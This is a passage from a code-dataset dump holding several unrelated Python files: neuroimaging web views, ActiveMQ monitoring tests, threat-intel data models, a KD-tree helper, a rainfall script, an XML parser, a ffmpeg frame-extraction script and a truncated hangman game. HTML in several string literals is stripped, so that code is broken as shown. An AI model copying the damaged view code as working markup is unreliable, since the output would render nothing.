= False\n\n def entity_description(self, entity):\n \"\"\" Generate a dictionary with the entity description.\n \"\"\"\n return {}\n\n def cell_call(self, row, col):\n \"\"\" Create the out of context view template\n \"\"\"\n # Get the entity\n entity = self.cw_rset.get_entity(row, col)\n\n # Get the associated images\n imagefiles = []\n if entity.cw_etype == 'Scan':\n if hasattr(entity, \"results_files\"):\n # TODO: deal with 4d images\n if entity.label not in [\"EPI\", \"DTI\"]:\n for efentries in entity.results_files:\n imagefiles.extend(\n [e.filepath for e in efentries.file_entries\n if e.filepath.endswith(tuple(AUTHORIZED_IMAGE_EXT))])\n\n # Create a viewer if some images has been detected\n limagefiles = len(imagefiles)\n if limagefiles > 0:\n href = self._cw.build_url(\n \"view\", vid=\"brainbrowser-image-viewer\", imagefiles=imagefiles,\n __message=(u\"Found {0} image(s) that can be \"\n \"displayed.\".format(limagefiles)))\n\n # Get the associated documentation if available\n if hasattr(entity, \"label\"):\n tooltip_name = entity.label\n tooltip = self._cw.vreg.docmap.get(entity.label, None)\n else:\n tooltip = None\n\n # Get the subjects/study/center related entities\n if hasattr(entity, \"subjects\"):\n nbsubjects = len(entity.subjects)\n elif entity.__class__.__name__ == \"Subject\":\n nbsubjects = 1\n else:\n nbsubjects = \"nc\"\n study = entity.study[0]\n\n # Get the entity symbol\n image = u\"\".format(\n self._cw.data_url(entity.symbol))\n\n # Create the div that will contain the list item\n self.w(u\"
\")\n\n # Create a bootstrap row item\n self.w(u\"
\")\n # > first element: the image\n self.w(u\"

{0}

\"\n \"
\".format(image))\n # > second element: the entity description + link\n self.w(u\"

{0}

\".format(\n entity.view(\"incontext\")))\n entity_desc = u\"Study {0}\".format(study.name)\n if nbsubjects not in [1, 'nc']:\n entity_desc += u\" - Number of subjects {0}\".format(\n nbsubjects)\n self.w(entity_desc)\n self.w(u\"
\")\n # > third element: the see more button\n self.w(u\"\")\n # > fourth element: the show button\n if limagefiles > 0:\n self.w(u\"\".format(href))\n self.w(u\"Show ☇\")\n self.w(u\"\")\n # > fifth element: the doc button\n if tooltip is not None:\n tiphref = self._cw.build_url(\"view\", vid=\"piws-documentation\",\n tooltip_name=tooltip_name,\n _notemplate=True)\n self.w(u\"\")\n self.w(u\"\".format(tiphref))\n self.w(u\"☇\")\n self.w(u\"\")\n\n # Close row item\n self.w(u'
')\n\n # Get the entity description\n entity_desc = self.entity_description(entity)\n\n # Create a div that will be show or hide when the see more button is\n # clicked\n self.w(u\"
\".format(row))\n self.w(u\"
\")\n for key, value in entity_desc.items():\n self.w(u\"
{0}
{1}
\".format(key, value))\n self.w(u\"
\")\n\n # Create a div that will be show or hide when the doc button is\n # clicked\n self.w(u\"
\".format(row))\n self.w(unicode(tooltip))\n self.w(u\"
\")\n\n # Close list item\n self.w(u\"
\")\n\n\n###############################################################################\n# Scans\n###############################################################################\n\nclass OutOfContextScanView(BaseOutOfContextView):\n __select__ = EntityView.__select__ & is_instance(\"Scan\")\n\n def entity_description(self, entity):\n \"\"\" Generate a dictionary with the Scan description.\n \"\"\"\n dtype_entity = entity.has_data[0]\n study = entity.study[0]\n desc = {}\n desc[\"Image Shape (x)\"] = dtype_entity.shape_x\n desc[\"Image Shape (y)\"] = dtype_entity.shape_y\n desc[\"Image Shape (z)\"] = dtype_entity.shape_z\n desc[\"Voxel resolution (x)\"] = dtype_entity.voxel_res_x\n desc[\"Voxel resolution (y)\"] = dtype_entity.voxel_res_y\n desc[\"Voxel resolution (z)\"] = dtype_entity.voxel_res_z\n desc[\"Repetition time\"] = dtype_entity.tr\n desc[\"Echo time\"] = dtype_entity.te\n desc[\"Scanner field\"] = dtype_entity.field\n #desc[\"Related subject\"] = subject.view(\"incontext\")\n desc[\"Related study\"] = study.view(\"incontext\")\n return desc\n\n\n###############################################################################\n# Assessment\n###############################################################################\n\nclass OutOfContextAssessmentView(BaseOutOfContextView):\n __select__ = EntityView.__select__ & is_instance(\"Assessment\")\n\n def entity_description(self, entity):\n \"\"\" Generate a dictionary with the Assessment description.\n \"\"\"\n center = entity.center[0]\n subjects = entity.subjects\n run_items = []\n run_items.extend(entity.processing_runs)\n run_items.extend(entity.scans)\n run_items.extend(entity.questionnaire_runs)\n run_items.extend(entity.genomic_measures)\n desc = {}\n desc[\"Acquisition center\"] = center.name\n if len(subjects) == 1:\n subject = subjects[0]\n desc[\"Gender\"] = subject.gender\n desc[\"Handedness\"] = subject.handedness\n desc[\"Age\"] = entity.age_of_subject\n desc[\"Related runs\"] = \" - \".join(\n [x.view(\"incontext\") for x in run_items])\n return desc\n\n\n###############################################################################\n# Subject\n###############################################################################\n\nclass OutOfContextSubjectView(BaseOutOfContextView):\n __select__ = EntityView.__select__ & is_instance(\"Subject\")\n\n def entity_description(self, entity):\n \"\"\" Generate a dictionary with the Subject description.\n \"\"\"\n desc = {}\n desc[\"Gender\"] = entity.gender\n desc[\"Handedness\"] = entity.handedness\n desc[\"Related assessments\"] = \"\".join(\n [\"
  • {1}
  • \".format(item.absolute_url(), item.identifier)\n for item in entity.assessments])\n href = self._cw.build_url(\n \"view\", vid=\"highcharts-relation-summary-view\",\n rql=\"Any A WHERE S eid '{0}', S assessments A\".format(entity.eid),\n relations=[\"scans\", \"questionnaire_runs\", \"genomic_measures\"],\n subject_attr=\"timepoint\", object_attr=\"label\",\n title=\"Acquisition status: {0}\".format(entity.code_in_study))\n desc[\"Acquisition summary\"] = \"status\".format(href)\n href = self._cw.build_url(\n \"view\", vid=\"highcharts-relation-summary-view\",\n rql=\"Any A WHERE S eid '{0}', S assessments A\".format(entity.eid),\n relations=\"related_processing\", subject_attr=\"timepoint\",\n object_attr=\"tool\", title=\"Processing status: {0}\".format(\n entity.code_in_study))\n desc[\"Processing summary\"] = \"status\".format(href)\n href = self._cw.build_url(\n \"view\", vid=\"questionnaire-longitudinal-measures\",\n rql=(\"Any QR WHERE S eid '{0}', S assessments A, \"\n \"A questionnaire_runs QR\".format(entity.eid)),\n patient_id=entity.code_in_study)\n desc[\"Measure summary\"] = \"status\".format(href)\n return desc\n\n\n###############################################################################\n# ProcessingRun\n###############################################################################\n\nclass OutOfContextProcessingRunView(BaseOutOfContextView):\n __select__ = EntityView.__select__ & is_instance(\"ProcessingRun\")\n\n def entity_description(self, entity):\n \"\"\" Generate a dictionary with the ProcessingRun description.\n \"\"\"\n desc = {}\n desc[\"Name\"] = entity.name\n desc[\"Tool\"] = entity.tool\n desc[\"Parameters\"] = entity.parameters\n desc[\"Note\"] = entity.note\n return desc\n\n\n###############################################################################\n# QuestionnaireRun\n###############################################################################\n\n\nclass OutOfContextQuestionnaireRunView(BaseOutOfContextView):\n __select__ = EntityView.__select__ & is_instance(\"QuestionnaireRun\")\n\n def entity_description(self, entity):\n \"\"\" Generate a dictionary with the QuestionnaireRun description.\n \"\"\"\n questionnaire = entity.instance_of[0]\n desc = {}\n desc[\"Related questionnaire\"] = questionnaire.view(\"incontext\")\n return desc\n\n\n###############################################################################\n# Default\n###############################################################################\n\nclass OutOfContextDefaultView(EntityView):\n __regid__ = \"outofcontext\"\n __select__ = EntityView.__select__ & is_instance(\"CWSearch\", \"CWUpload\")\n\n def cell_call(self, row, col):\n \"\"\" Create the default view line by line.\n \"\"\"\n # Get the processing run entity\n entity = self.cw_rset.get_entity(row, col)\n\n # Create the div that will contain the list item\n self.w(u'
    ')\n\n # Create a bootstrap row item\n self.w(u'
    ')\n # > add the scan description + link\n self.w(u'

    {0}

    '.format(\n entity.view(\"incontext\")))\n self.w(u'
    ')\n # Close row item\n self.w(u'
    ')\n\n # Close list item\n self.w(u'
    ')\n\n\n###############################################################################\n# Register views\n###############################################################################\n\ndef registration_callback(vreg):\n \"\"\" Update outofcontext views.\n \"\"\"\n vreg.register(OutOfContextDefaultView)\n vreg.register(OutOfContextProcessingRunView)\n vreg.register_and_replace(OutOfContextScanView, ScanOutOfContextView)\n vreg.register_and_replace(OutOfContextSubjectView, SubjectOutOfContextView)\n vreg.register_and_replace(\n OutOfContextAssessmentView, AssessmentOutOfContextView)\n vreg.register_and_replace(\n OutOfContextQuestionnaireRunView, QuestionnaireRunOutOfContextView)\n","sub_path":"piws/views/secondary.py","file_name":"secondary.py","file_ext":"py","file_size_in_byte":12922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"595820184","text":"import unittest\n\nimport mock\n\nfrom tests.checks.common import get_check\n\n\nclass ActiveMQXMLTestCase(unittest.TestCase):\n def setUp(self):\n self.config = \"\"\"\ninit_config:\n\ninstances:\n - username: username\n password: password\n url: http://localhost:8161\n\"\"\"\n\n def test_fetch_data(self):\n # not too concerned with the response body, just that requests.get was called\n # with the correct arguments\n check, instances = get_check('activemq_xml', self.config)\n check.requests = mock.Mock()\n check._fetch_data('http://localhost:8171', '/admin/xml/queues.jsp', None, None)\n assert check.requests.get.call_count == 1\n assert check.requests.get.call_args == mock.call(\n 'http://localhost:8171/admin/xml/queues.jsp', auth=None\n )\n\n check.requests.get.reset_mock()\n check._fetch_data('http://localhost:8171', '/admin/xml/queues.jsp', 'user', 'pass')\n assert check.requests.get.call_count == 1\n assert check.requests.get.call_args == mock.call(\n 'http://localhost:8171/admin/xml/queues.jsp', auth=('user', 'pass')\n )\n\n def test_check(self):\n check, instances = get_check('activemq_xml', self.config)\n check.requests = mock.Mock()\n\n def response_side_effect(*args, **kwargs):\n text = ''\n if '/admin/xml/topics.jsp' in args[0]:\n text = ''\n elif '/admin/xml/queues.jsp' in args[0]:\n text = ''\n elif '/admin/xml/subscribers.jsp' in args[0]:\n text = ''\n # if text='' then we will get an xml parsing error\n # (which is what we want if we called with a url we dont know)\n return mock.Mock(text=text)\n\n check.requests.get.side_effect = response_side_effect\n check.check(instances[0])\n expected = {\n 'url:http://localhost:8161': {\n 'activemq.queue.count': (0, 'gauge'),\n 'activemq.topic.count': (0, 'gauge'),\n 'activemq.subscriber.count': (0, 'gauge'),\n }\n }\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def test_process_queue_data_normal(self):\n check, instances = get_check('activemq_xml', self.config)\n\n data = \"\"\"\n \n \n \n \n queueBrowse/Queue1;jsessionid=sess_token?view=rss&feedType=atom_1.0\n queueBrowse/Queue1;jsessionid=sess_token?view=rss&feedType=rss_2.0\n \n \n \n \n \n queueBrowse/Queue2;jsessionid=sess_token?view=rss&feedType=atom_1.0\n queueBrowse/Queue2;jsessionid=sess_token?view=rss&feedType=rss_2.0\n \n \n \n \"\"\"\n check._process_data(data, \"queue\", [], 300, [])\n expected = {\n 'queue:Queue2': {\n 'activemq.queue.size': ('10', 'gauge'),\n 'activemq.queue.enqueue_count': ('1165', 'gauge'),\n 'activemq.queue.dequeue_count': ('1165', 'gauge'),\n 'activemq.queue.consumer_count': ('3', 'gauge')\n },\n '': {\n 'activemq.queue.count': (2, 'gauge')\n },\n 'queue:Queue1': {\n 'activemq.queue.dequeue_count': ('64714', 'gauge'),\n 'activemq.queue.consumer_count': ('6', 'gauge'),\n 'activemq.queue.size': ('0', 'gauge'),\n 'activemq.queue.enqueue_count': ('64714', 'gauge'),\n },\n }\n\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def test_process_queue_data_no_data(self):\n check, instances = get_check('activemq_xml', self.config)\n\n data = \"\"\"\n \n \n \"\"\"\n check._process_data(data, \"queue\", [], 300, [])\n expected = {\n '': {\n 'activemq.queue.count': (0, 'gauge')\n },\n }\n\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def test_process_topics_data_normal(self):\n check, instances = get_check('activemq_xml', self.config)\n\n data = \"\"\"\n \n \n \n \n \n \n \n \n \"\"\"\n\n check._process_data(data, \"topic\", [], 300, [])\n expected = {\n 'topic:Topic1': {\n 'activemq.topic.size': ('5', 'gauge'),\n 'activemq.topic.enqueue_count': ('24', 'gauge'),\n 'activemq.topic.dequeue_count': ('0', 'gauge'),\n 'activemq.topic.consumer_count': ('0', 'gauge')\n },\n '': {\n 'activemq.topic.count': (2, 'gauge')\n },\n 'topic:Topic2': {\n 'activemq.topic.dequeue_count': ('1200', 'gauge'),\n 'activemq.topic.consumer_count': ('50', 'gauge'),\n 'activemq.topic.size': ('1', 'gauge'),\n 'activemq.topic.enqueue_count': ('12', 'gauge'),\n },\n }\n\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def test_process_topic_data_no_data(self):\n check, instances = get_check('activemq_xml', self.config)\n\n data = \"\"\"\n \n \n \"\"\"\n check._process_data(data, \"topic\", [], 300, [])\n expected = {\n '': {\n 'activemq.topic.count': (0, 'gauge')\n },\n }\n\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def test_process_subscriber_data_normal(self):\n check, instances = get_check('activemq_xml', self.config)\n\n data = \"\"\"\n \n \n \n \n \n \n \n \n \"\"\"\n check._process_subscriber_data(data, [], 300, [])\n expected = {\n 'active:yes-clientId:10-connectionId:10-destinationName:Queue1-selector:*-subscriptionName:subscription1': {\n 'activemq.subscriber.enqueue_counter': ('235', 'gauge'),\n 'activemq.subscriber.dequeue_counter': ('175', 'gauge'),\n 'activemq.subscriber.dispatched_counter': ('15', 'gauge'),\n 'activemq.subscriber.dispatched_queue_size': ('15', 'gauge'),\n 'activemq.subscriber.pending_queue_size': ('5', 'gauge'),\n },\n '': {\n 'activemq.subscriber.count': (2, 'gauge'),\n },\n 'active:no-clientId:5-connectionId:15-destinationName:Topic1-selector:*-subscriptionName:subscription2': {\n 'activemq.subscriber.enqueue_counter': ('12', 'gauge'),\n 'activemq.subscriber.dequeue_counter': ('15', 'gauge'),\n 'activemq.subscriber.dispatched_counter': ('5', 'gauge'),\n 'activemq.subscriber.dispatched_queue_size': ('0', 'gauge'),\n 'activemq.subscriber.pending_queue_size': ('0', 'gauge'),\n },\n }\n\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def test_process_subscriber_data_no_data(self):\n check, instances = get_check('activemq_xml', self.config)\n\n data = \"\"\"\n \n \n \"\"\"\n check._process_subscriber_data(data, [], 300, [])\n expected = {\n '': {\n 'activemq.subscriber.count': (0, 'gauge')\n },\n }\n\n self._assert_expected_metrics(expected, check.get_metrics())\n\n def _iter_metrics(self, metrics):\n for name, _, value, data in metrics:\n tags = sorted(data.get('tags', []))\n tags = '-'.join(tags)\n yield tags, name, value, data['type']\n\n def _assert_expected_metrics(self, expected, metrics):\n count = sum(len(r.keys()) for r in expected.values())\n self.assertEqual(count, len(metrics), (count, metrics))\n\n for tags, key, value, el_type in self._iter_metrics(metrics):\n self.assertEquals(expected.get(tags, {}).get(key), (value, el_type), (tags, key, metrics))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/checks/mock/test_activemq_xml.py","file_name":"test_activemq_xml.py","file_ext":"py","file_size_in_byte":9872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"602304677","text":"from datetime import datetime\nfrom .base import AutoFocusObject\n\n\nclass Whois(AutoFocusObject):\n def __init__(self, kwargs):\n\n #: str: country information\n self.admin_country = kwargs.get(\"whoisAdminCountry\")\n\n #: str: admin email\n self.admin_email = kwargs.get(\"whoisAdminEmail\")\n\n # str: name of admin\n self.admin_name = kwargs.get(\"whoisAdminName\")\n created = kwargs.get(\"whoisDomainCreationDate\")\n\n #: datetime: when domain was created\n self.domain_creation_date = datetime.strptime(created, \"%Y-%m-%d\") if created else None\n expiration = kwargs.get(\"whoisDomainExpireDate\")\n\n #: datetime: when domain expires\n self.domain_expiration_date = datetime.strptime(expiration, \"%Y-%m-%d\") if expiration else None\n updated = kwargs.get(\"whoisDomainUpdateDate\")\n\n #: datetime: when domain was updated\n self.domain_updated_date = datetime.strptime(updated, \"%Y-%m-%d\") if updated else None\n\n #: str: registrar for domain\n self.registrar = kwargs.get(\"whoisRegistrar\")\n\n #: str: registrar url\n self.registrar_url = kwargs.get(\"whoisRegistrarUrl\")\n\n #: str: registrant\n self.registrant = kwargs.get(\"whoisRegistrant\")\n\n\nclass ThreatIntelCard(AutoFocusObject):\n def __init__(self, kwargs):\n\n _first_seen_ts = kwargs.get(\"firstSeenTsGlobal\")\n #: datetime: when indicator was first seen\n self.first_seen = datetime.fromtimestamp(_first_seen_ts / 1000) if _first_seen_ts else None\n\n _last_seen_ts = kwargs.get(\"lastSeenTsGlobal\")\n #: datetime: when indicator was last seen\n self.last_seen = datetime.fromtimestamp(_last_seen_ts / 1000) if _last_seen_ts else None\n\n #: List[str]: which data sources saw indicator\n self.seen_by = kwargs.get(\"seenByDataSourceIds\")\n\n verdicts = kwargs.get(\"latestPanVerdicts\")\n wildfire_verdict = verdicts.get(\"WF_SAMPLE\")\n pandb_verdict = verdicts.get(\"PAN_DB\")\n\n #: str: verdict in WF if seen by WF\n self.wildfire_verdict = wildfire_verdict.lower() if wildfire_verdict else None\n\n #: str: verdict in PanDB if seen by PanDB\n self.pandb_verdict = pandb_verdict.lower() if pandb_verdict else None\n\n # Whois: whois information if available\n self.whois = Whois(kwargs)\n","sub_path":"autofocus/models/tic.py","file_name":"tic.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"93997032","text":"# -*- coding:utf-8 -*-\n\nfrom scipy import spatial\nimport numpy as np\n\nclass kdtree:\n def __init__(self, data):\n self.tree = spatial.KDTree(data)\n self.data = self.tree.data\n\n def serch(self, point):\n result = self.tree.query(np.array(point))\n return self.data[result[1]].tolist()\n\n\n\nif __name__ == '__main__':\n x, y = np.mgrid[0:5, 2:8]\n test = list(zip(x.ravel(), y.ravel()))\n my_kdtree = kdtree(test)\n point = [0,0]\n result = my_kdtree.serch(point)\n print(result)","sub_path":"GA-VFGA/GA-VF/kdtree.py","file_name":"kdtree.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"38348918","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 8 12:41:31 2018\n\n@author: Jitske\n\"\"\"\n\nimport json\n\nwith open('precipitation.json') as file:\n info = json.load(file)\n \n# format stations: Seattle,WA,GHCND:US1WAKG0038\n \n# format data: [{'datatype': 'PRCP', 'date': '2010-01-01', \n# 'station': 'GHCND:USW00093814', 'value': 0}] \n\nstation_info = []\nwith open('stations.csv') as file:\n for line in file:\n line = line.strip('\\n')\n line = line.split(',')\n station_info += [line]\n\nstation1 = []\nstation2 = []\nstation3 = []\nstation4 = []\n\nmonthly_prec1 = 12*[0] \nmonthly_prec2 = 12*[0]\nmonthly_prec3 = 12*[0]\nmonthly_prec4 = 12*[0]\n# Order is: year-month-day\n\n\nmy_dict = {}\nfor entry in range(1,len(station_info)):\n my_dict[station_info[entry][0]] = {\n 'station':station_info[entry][2], \n 'state':station_info[entry][1]}\n\nprint(my_dict)\n\n# For all entries in info, check if it's Seattle and add that to a seperate list\nfor entry in range(len(info)):\n temp = info[entry]['station'] ## select station code\n month = int(info[entry]['date'][5:7]) ## Select the Month, by looking at \n ## every entry, then at the key 'date' and then \n ## taking the month part from the string \n \n if temp == station_info[1][2]:\n station1 += [info[entry]]\n ## At loc month-1 (bc index starts at 0), add the precipitation for that day\n monthly_prec1[month-1]+= info[entry]['value'] \n \n #select all entries for Seattle and make that a list (Seattle,WA,GHCND:US1WAKG0038)\n if temp == station_info[2][2]:\n station2 += [info[entry]]\n monthly_prec2[month-1]+= info[entry]['value'] \n\n if temp == station_info[3][2]:\n station3 += [info[entry]]\n monthly_prec3[month-1]+= info[entry]['value'] \n \n if temp == station_info[4][2]:\n station4 += [info[entry]]\n monthly_prec4[month-1]+= info[entry]['value'] \n\nmy_dict[station_info[1][0]]['totalMonthlyPrecipitation'] = monthly_prec1\nmy_dict[station_info[2][0]]['totalMonthlyPrecipitation'] = monthly_prec2\nmy_dict[station_info[3][0]]['totalMonthlyPrecipitation'] = monthly_prec3 \nmy_dict[station_info[4][0]]['totalMonthlyPrecipitation'] = monthly_prec4\n\nprint(my_dict)\n\n\nmonthly_prec = [monthly_prec1,monthly_prec2,monthly_prec3,monthly_prec4]\n\n\n## Yearly precipitation per city \nyearly_prec = [sum(monthly_prec1),sum(monthly_prec2),sum(monthly_prec3),sum(monthly_prec4)]\ntotal_prec = sum(yearly_prec)\n \nrel_monthly_prec = [12*[0], 12*[0], 12*[0], 12*[0]]\n\nfor i in range(len(monthly_prec)):\n for j in range(len(monthly_prec[i])):\n rel_monthly_prec[i][j] = round(monthly_prec[i][j]/yearly_prec[i], 2)\n\n\n## Calculate relative yearly prec and store in dict \n## Also store other vars in dic\ncount = 0\nfor entry in my_dict:\n my_dict[entry]['relativeMonthlyPrecipitation'] = rel_monthly_prec[count]\n my_dict[entry]['totalYearlyPrecipitation'] = yearly_prec[count]\n my_dict[entry]['relativeYearlyPrecipitation'] = round(yearly_prec[count]/total_prec,2)\n\n count += 1 \n \n\nprint(my_dict)\n\n# Write to a json file \nwith open('results.json', 'w') as file:\n json.dump(my_dict, file, indent=4) \n\n","sub_path":"Koeleman_Ass3_code.py","file_name":"Koeleman_Ass3_code.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"273002158","text":"import xml.sax\n\n# khai bao cac bien\nclass PhimHandler(xml.sax.ContentHandler):\n def __init__(self):\n self.CurrentData = \"\"\n self.ho_ten = \"\"\n self.ngay_sinh = \"\"\n self.ma_mon = \"\"\n self.diem = \"\"\n \n # ghi cac tag co attributes\n # Call when an element starts\n def startElement(self, tag, attributes):\n self.CurrentData = tag\n if tag == \"HOC_SINH\":\n print(\"* \"*30)\n self.ho_ten = attributes[\"Ho_ten\"]\n self.ngay_sinh = attributes[\"Ngay_sinh\"]\n print(\"Ho ten : \",self.ho_ten)\n print(\"Ngay sinh : \",self.ngay_sinh)\n\n elif tag == \"KET_QUA\" :\n self.ma_mon = attributes[\"Ma_mon\"]\n self.diem = attributes[\"Diem\"]\n print(\"Ma mon : \",self.ma_mon)\n print(\"Diem : \",self.diem)\n elif self.CurrentData == \"KET_QUA_THI\" :\n print(\"Ket qua thi\")\n # self.CurrentData = \"\"\n \n # ghi the tag ko co attributes\n # Call when an elements ends\n def endElement(self, tag):\n\n self.CurrentData = \"\"\n\n # gan content text \n # Call when a character is read\n def characters(self, content):\n pass\n \n\nif (__name__ == \"__main__\"):\n # create an XMLReader\n parser = xml.sax.make_parser()\n # override the default ContextHandler\n Handler = PhimHandler()\n parser.setContentHandler(Handler)\n Ten_Tap_tin = \"ket_qua_hoc_tap.xml\"\n parser.parse(Ten_Tap_tin)\n","sub_path":"XML/XML/ket_qua_hoc_tap_SAX_.py","file_name":"ket_qua_hoc_tap_SAX_.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"451898361","text":"\n\"\"\"\nCreate a function that takes a Roman numeral as its argument and returns its value as a numeric decimal integer. You don't need to validate the form of the Roman numeral.\n\nModern Roman numerals are written by expressing each decimal digit of the number to be encoded separately, starting with the leftmost digit and skipping any 0s. So 1990 is rendered \"MCMXC\" (1000 = M, 900 = CM, 90 = XC) and 2008 is rendered \"MMVIII\" (2000 = MM, 8 = VIII). The Roman numeral for 1666, \"MDCLXVI\", uses each letter in descending order.\n\nExample:\n\nsolution('XXI') # should return 21\n\nHelp:\n\nSymbol Value\nI 1\nV 5\nX 10\nL 50\nC 100\nD 500\nM 1,000\n\n\"\"\"\n\nsymbols= {\n\"I\" : 1,\n\"V\" : 5,\n\"X\" : 10,\n\"L\" : 50,\n\"C\" : 100,\n\"D\" : 500,\n\"M\" : 1_000}\n\n\ndef solution(roman):\n n = 0\n for i in range(len(roman)-1):\n l = roman[i]\n if symbols[l] >= symbols[roman[i+1]]:\n n += symbols[l]\n else:\n n -= symbols[l]\n return n + symbols[roman[-1]]\n ","sub_path":"6kyu_Counting_Duplicates.py","file_name":"6kyu_Counting_Duplicates.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"85331133","text":"#!/usr/bin/python\nimport os\nimport shutil\nimport sys\nfrom sys import platform\n\nproject=sys.argv[1]\nproject_name=os.path.basename(project)\nreference_frame_dir=project+\"/shared/reference_frames\"\nif platform==\"win32\":\n\tffmpeg=\"C:/CatsFarm/os/windows/ffmpeg/ffmpeg.exe\"\nelse:\n\tffmpeg=\"ffmpeg\"\n#-----------------\nreference_frame=1\n#------------------\nvideo_format=[\"mov\",\"mp4\",\"jpg\",\"tiff\",\"dpx\"]\n#----------------------------------------\n\nif not os.path.isdir(reference_frame_dir):\n\tos.makedirs(reference_frame_dir)\n\nshots=[]\n\nclass stamp():\n\tdef __init__(self):\n\t\t#chekea si el proyecyo tiene secuencias\n\t\tisSec=False\n\t\tfor sec in self.listdir(project):\n\t\t\tsec=sec.split(\"_\")[0]\n\t\t\tif sec ==\"sec\" or sec==\"roll\":\n\t\t\t\tisSec=True\n\t\t#------------------------------------\n\t\tif isSec:\n\t\t\tfor sec in self.listdir(project):\n\t\t\t\tsec_path=project+\"/\"+sec\n\t\t\t\tself.for_shot(sec,sec_path)\n\t\t\tself.make_image()\n\n\t\telse:\n\t\t\tself.for_shot(\"sec_001\",project)\n\t\t\tself.make_image()\n\n\tdef for_shot(self,sec,sec_path):\n\n\n\t\tfor shot in self.listdir(sec_path):\n\t\t\tshot_path=sec_path+\"/\"+shot\n\n\t\t\tcontent=[\"renders\",\"render\",\"footage\",\"assets\"]\n\n\t\t\tfor c in content:\n\t\t\t\tc=shot_path+\"/\"+c\n\t\t\t\tvideo=False\t\n\t\t\t\tfor root, dir, file in os.walk(c):\n\n\t\t\t\t\text=None\n\t\t\t\t\tfor f in file:\n\t\t\t\t\t\tvideo_ok=root+\"/\"+f\n\t\t\t\t\t\text=f.split(\".\")[-1]\n\t\t\t\t\t\tif ext in video_format:\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif ext in video_format:\n\t\t\t\t\t\tvideo=True\n\t\t\t\t\t\tbreak\n\n\t\t\t\tif video:\n\t\t\t\t\tbreak\n\n\t\t\ttry:shots.append((video_ok,project_name+\"_\"+sec+\"_\"+shot))\n\t\t\texcept:None\n\n\tdef make_image(self):\n\t\tfor shot, name in shots:\n\t\t\tcmd=ffmpeg+' -i \"'+shot+'\" -vframes '+str(reference_frame)+' \"'+reference_frame_dir+\"/\"+name+'.jpg\"'\n\t\t\tos.system(cmd)\n\t\t\tprint (cmd)\n\n\tdef listdir(self,dirs):\n\t\ttry:return os.listdir(dirs)\n\t\texcept: return []\nstamp()","sub_path":"stamp_project.py","file_name":"stamp_project.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"461954247","text":"from random import randint\n#relativo aos desenhos da forca, várias funções, o código está abaixo dos desenhos\ndef erro1():\n print(\"\"\"\n\n|─|─────────────────|\n| | (--)\n| |\n| |\n| |\n| |\n| |\n| |\n|_|______________________\nvocê tem 6 tentativas\n─────────────────────────\n\"\"\")\ndef erro2():\n print(\"\"\"\n\n|─|─────────────────|\n| | (oo)\n| | ||\n| | ||\n| | ||\n| |\n| |\n| |\n|_|______________________\nvocê tem 5 tentativas\n─────────────────────────\n\"\"\")\ndef erro3():\n print(\"\"\"\n\n|─|─────────────────|\n| | (oo)\n| | ||_\n| | || \\\\\n| | || \\\\\n| |\n| |\n| |\n|_|______________________\nvocê tem 4 tentativas\n─────────────────────────\n\"\"\")\ndef erro4():\n print(\"\"\"\n\n|─|─────────────────|\n| | (oo)\n| | _||_\n| | / || \\\\\n| | / || \\\\\n| |\n| |\n| |\n|_|______________________\nvocê tem 3 tentativas\n─────────────────────────\n\"\"\")\ndef erro5():\n print(\"\"\"\n\n|─|─────────────────|\n| | (oo)\n| | _||_\n| | / || \\\\\n| | / || \\\\\n| | /\n| | _/\n| |\n|_|______________________\nvocê tem 2 tentativas\n─────────────────────────\n\"\"\")\ndef erro6():\n print(\"\"\"\n\n|─|─────────────────|\n| | (oo)\n| | _||_\n| | / || \\\\\n| | / || \\\\\n| | /\\\\\n| | _/ \\\\_\n| |\n|_|_______________________\nvocê só tem 1 tentativa!!!\n──────────────────────────\n\"\"\")\ndef ganhou():\n print('''\n----Parabéns!!!!------\n───▐▀▄─────────▄▀▌───\n───▐▓░▀▄▀▀▀▀▀▄▀░▓▌───\n───▐░▓░▄▀░░░▀▄░▓░────\n────█░░▌█▐░▌█▐░░█────\n─▄▄▄▐▀░░░▀█▀░░░▀▌▄▄▄─\n█▐▐▐▌▀▄░▀▄▀▄▀░▄▀▐▌▌▌█\n▀▀▀▀▀▀▀▀▀▄▄▄▀▀▀▀▀▀▀▀▀\n───Você ganhou !!!───\n─────────────────────''')\ndef erro7():\n 